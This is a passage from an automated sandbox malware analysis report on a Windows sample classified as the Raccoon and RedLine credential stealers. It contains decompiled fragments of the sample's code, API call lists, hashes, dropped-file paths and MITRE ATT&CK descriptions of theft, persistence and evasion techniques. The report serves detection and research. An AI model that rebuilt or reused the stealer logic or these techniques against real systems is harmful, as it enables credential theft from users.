							_t51 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t98 = 0x10;
							_t53 = E0040A05F(_t51, _t98);
							_v60 = _t53;
							_t54 =  *((intOrPtr*)( *0x40e13c))(_t52,  *0x40e210);
							_t110 = _v68;
							_t55 = E0040A503(_t54, _t110);
							_t87 =  *0x40e204; // 0x825d40
							_v80 = _t55;
							_v88 = _t87;
							_v84 = 0;
							_t57 = E00408619( &_v80);
							_v76 = _t57;
							_t118 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, 0, 0, 0, 0);
							if(0 != 0) {
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, _t118, 0, 0, 0);
								if(0 != 0) {
									E00407EDB(_v144, _t118, 0, 0, _v164, _t78, _v148,  &_v160);
								}
							}
							LocalFree(_t118);
							LocalFree(_v116);
							LocalFree(_v120);
							LocalFree(_t110);
						}
						_t115 = 1;
						L16:
						LocalFree(_t78);
						_t49 = _t115;
						L17:
						return _t49;
					}
					_t119 = 0;
					if(_t47 == 0) {
						goto L10;
					}
					_t94 = _v56;
					_t111 = _t107 + 0xfffffffc;
					_t102 = _v64;
					_t69 = _t94 - 6;
					_v52 = _t69;
					do {
						if(_t119 <= 0) {
							goto L9;
						}
						_t102 = _v64;
						if( *((intOrPtr*)(_t94 + _t119 * 2)) != 0) {
							goto L9;
						}
						_v40 =  *_t69;
						_v38 =  *_t111;
						_v36 = 0;
						_v32 = 0;
						_t74 = E0040AE06( &_v40, _t78,  &_v68, _v44,  &_v40, _t73, _v48, 0);
						_t123 = _t123 + 0x14;
						if(_t74 < 0) {
							_t115 = _t119 | 0xffffffff;
							goto L16;
						}
						_t119 = _t119 + 1;
						_t94 = _v56;
						_t69 = _v52 + 2;
						_t102 = _v64;
						_t111 = _t111 + 2;
						L9:
						_t119 = _t119 + 3;
						_t69 = _t69 + 6;
						_t111 = _t111 + 6;
						_v52 = _t69;
					} while (_t119 < _t102);
					goto L10;
				}
				_t49 = LocalFree(_t78) | 0xffffffff;
				goto L17;
			}

APIs

LocalFree.KERNEL32(00000000), ref: 0040AC20

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: cb3fde234ea3763666557004fa5848a319dd513b55e0471afea34829c7d77506
Instruction ID: 0df1316ab9a5c1427916cb56fbbb1f674cf856c690d2ecf6bb3ed985b7a3ed22
Opcode Fuzzy Hash: cb3fde234ea3763666557004fa5848a319dd513b55e0471afea34829c7d77506
Instruction Fuzzy Hash: AF517EB1604311AFE304DB26DD44A2B76E9EBC8714F004A2EF959E72D0DA749D118BAB

Uniqueness

Uniqueness Score: -1.00%

Function 022BA14C Relevance: 7.7, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022BA194

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
Instruction ID: 7e54b64a86e0f29b9dbbd37c0244e07358a3befe0fb293a8972cbf03e43b1ef9
Opcode Fuzzy Hash: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
Instruction Fuzzy Hash: FB51BBB1A14301AFE305DF69CD44E7B76E9EFC8754F004A29F969E7290EA70DD008B66

Uniqueness

Uniqueness Score: -1.00%

Function 022B9632 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 022B964A
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 022B9676
GlobalFree.KERNEL32(00000000), ref: 022B96D3

Strings

iqroq5112542785672901323, xrefs: 022B963F

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CurrentErrorFreeGlobalLastProcess
String ID: iqroq5112542785672901323
API String ID: 775681509-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: e71cad3fa76c2f5a2884749fffc4437ef1378f1f17fb1fb53cbc1caa21ec929a
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 69117F35910116BBDB129BEADE44FEE7BB8EF48390F000464EA10E2160DB70DA64DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00403760 Relevance: 6.2, APIs: 4, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039CB

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

DeleteFileW.KERNEL32(?), ref: 004039AA
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 004039BA
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039C1

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 0273935b1b11092318b069b65173c2f6a9546147bbdeeea3bf04ef57adf8446e
Instruction ID: 855b80ec5d303092bec4e067a8265e7fa441cfeb4fa3f9afbe0cd358cb9c57d7
Opcode Fuzzy Hash: 0273935b1b11092318b069b65173c2f6a9546147bbdeeea3bf04ef57adf8446e
Instruction Fuzzy Hash: EF718D71500210EFDB059FA6EE84A5E3BB9FB48310B104979F925F72E0DB74DA208B5A

Uniqueness

Uniqueness Score: -1.00%

Function 022B2CD4 Relevance: 6.2, APIs: 4, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 022B2F3F

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

DeleteFileW.KERNEL32(?), ref: 022B2F1E
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 022B2F2E
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 022B2F35

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
Instruction ID: 9445bb9a262aac3ad4c0638b55667cafbb3d248e62cd20bc0e25bd77bdcc08cf
Opcode Fuzzy Hash: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
Instruction Fuzzy Hash: 6B718D31510211EFDB029FA6EE44AAD3BB5FF48350B104A34F925E72B0DB749A20CF59

Uniqueness

Uniqueness Score: -1.00%

Function 022B0EE2 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 022B0F84
LocalFree.KERNEL32(00000000), ref: 022B0FA4
FindClose.KERNEL32(00000000), ref: 022B0FC2
PathCombineW.SHLWAPI(00000000,?,?), ref: 022B1018

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CombinePath$CloseFindFreeLocal
String ID:
API String ID: 2199340046-0
Opcode ID: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
Instruction ID: 791021f6d5f33ce24133542edfd6229b1ee8e2cfe2ee655ed6fa1ab4ea4e9fa8
Opcode Fuzzy Hash: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
Instruction Fuzzy Hash: 75412671620215ABCB269B91CD88FEB7378EF45340F0009A8FA15A3190EF749B55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 022B1079 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 022B111D
LocalFree.KERNEL32(00000000), ref: 022B1181
FindClose.KERNEL32(00000000), ref: 022B11EE

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID:
API String ID: 2857355001-0
Opcode ID: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
Instruction ID: 00e62f443acd3a030175831a7a67186c90d8531fb6d1dd32b4aeb7cb208db7c3
Opcode Fuzzy Hash: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
Instruction Fuzzy Hash: B4415471520228ABCB269FA1DD94FEB3378EF85300F000864FE09A3164EB709A65CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B3511 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 022B3542
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 022B354F
LocalFree.KERNEL32(00000000), ref: 022B3580
LocalFree.KERNEL32(00000000), ref: 022B358B

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FolderFreeLocalPathSpecial
String ID:
API String ID: 1111715986-0
Opcode ID: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
Instruction ID: ea3534ed1ee4bc62e67e1bc371e1e5525ed56c01de1d275160d032a3adcb2b6c
Opcode Fuzzy Hash: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
Instruction Fuzzy Hash: C101F5713502147BE7205B92AD4AFAB3769DFC9B60F140128FB18AB2C0DAB0991086A9

Uniqueness

Uniqueness Score: -1.00%

Function 022B85D8 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,022B8FC4,00000000), ref: 022B8610
wsprintfW.USER32 ref: 022B8621

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7092), ref: 022B8639
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7092), ref: 022B8640

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$DefaultGlobalUserwsprintf
String ID:
API String ID: 3020363445-0
Opcode ID: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
Instruction ID: 83dfa4baab5fdddd3388dd810f82621eb8a6ea3a203a780694a518acfe37cdac
Opcode Fuzzy Hash: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
Instruction Fuzzy Hash: 22F068B1240214AFF3049BA6AD89E6677ACEB48764F044435F749B7290CAB56C608A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2AA Relevance: 5.1, APIs: 4, Instructions: 117
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A2AA(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t25;
				void* _t29;
				void* _t30;
				void* _t39;
				void* _t47;
				void* _t52;
				intOrPtr _t54;
				void* _t70;
				void* _t77;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				signed int _t85;

				_t25 =  *0x40e1b8; // 0x825c20
				_v12 = _t25;
				_v20 = __edx;
				_v16 = __ecx;
				_t29 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(__ecx) * 2);
				_t54 = _v16;
				_t52 = _t29;
				_t30 = 2;
				_t76 =  ==  ? _t30 : 0;
				_t77 = ( ==  ? _t30 : 0) + _t54;
				if(_t77 != 0) {
					do {
						_t39 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(_t54) * 2);
						_v8 = _t39;
						_t82 =  *((intOrPtr*)( *0x40e18c))(_t77,  *0x40e258);
						if(_t82 == 0) {
							if(_a4 == 0) {
								_push(_t77);
								if(E0040A3E4(_t77,  &_v8, 0,  *((intOrPtr*)( *0x40e08c))()) != 0) {
									_t47 = E0040A503(_t52, _v12);
									_t70 = _v8;
									goto L9;
								}
							} else {
								_t47 = E0040A503(_t52, _v12);
								_t70 = _a4;
								L9:
								_t52 = E0040A503(_t47, _t70);
							}
							_t83 = _v20;
							 *_t83 =  *((intOrPtr*)( *0x40e13c))( *_t83, _t52);
							_t77 = 0;
						} else {
							_t85 = _t82 - _t77 >> 1;
							if(E0040A3E4(_t77,  &_v8, 0, _t85) != 0) {
								_t52 = E0040A503(E0040A503(_t52, _v12), _v8);
							}
							_t77 = _t77 + _t85 * 2 + 2;
						}
						LocalFree(_v8);
						_t54 = _v16;
					} while (_t77 != 0);
				}
				_t80 = _v20;
				 *_t80 =  *((intOrPtr*)( *0x40e13c))( *_t80, _t52);
				LocalFree(_t52);
				return 1;
			}

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A2D9
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A30C
LocalFree.KERNEL32(?,?,00000000,00000000,?), ref: 0040A3B5

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040A3D6

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$Global
String ID:
API String ID: 2107727554-0
Opcode ID: f075e1c407a2bf6e50d5205a2f9a31135d687d93ab644a6ad8db2f955380cc72
Instruction ID: 8d9fe808253cfd760579b52592682b105d53dbc0a4ab2c38afac3778b4664aea
Opcode Fuzzy Hash: f075e1c407a2bf6e50d5205a2f9a31135d687d93ab644a6ad8db2f955380cc72
Instruction Fuzzy Hash: 5A419572A00314EFDB14DFA5DD81AAE77B5EB88310F10497AE941B7390DBB89D20CB95

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9n6ctoq7cn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Company\NewProduct\F0geI.exe

C:\Program Files (x86)\Company\NewProduct\brokerius.exe

C:\Program Files (x86)\Company\NewProduct\captain09876.exe

C:\Program Files (x86)\Company\NewProduct\jshainx.exe

C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

C:\Program Files (x86)\Company\NewProduct\me.exe

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe

C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe

C:\Program Files (x86)\Company\NewProduct\real.exe

C:\Program Files (x86)\Company\NewProduct\safert44.exe

Windows Analysis Report
9n6ctoq7cn.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
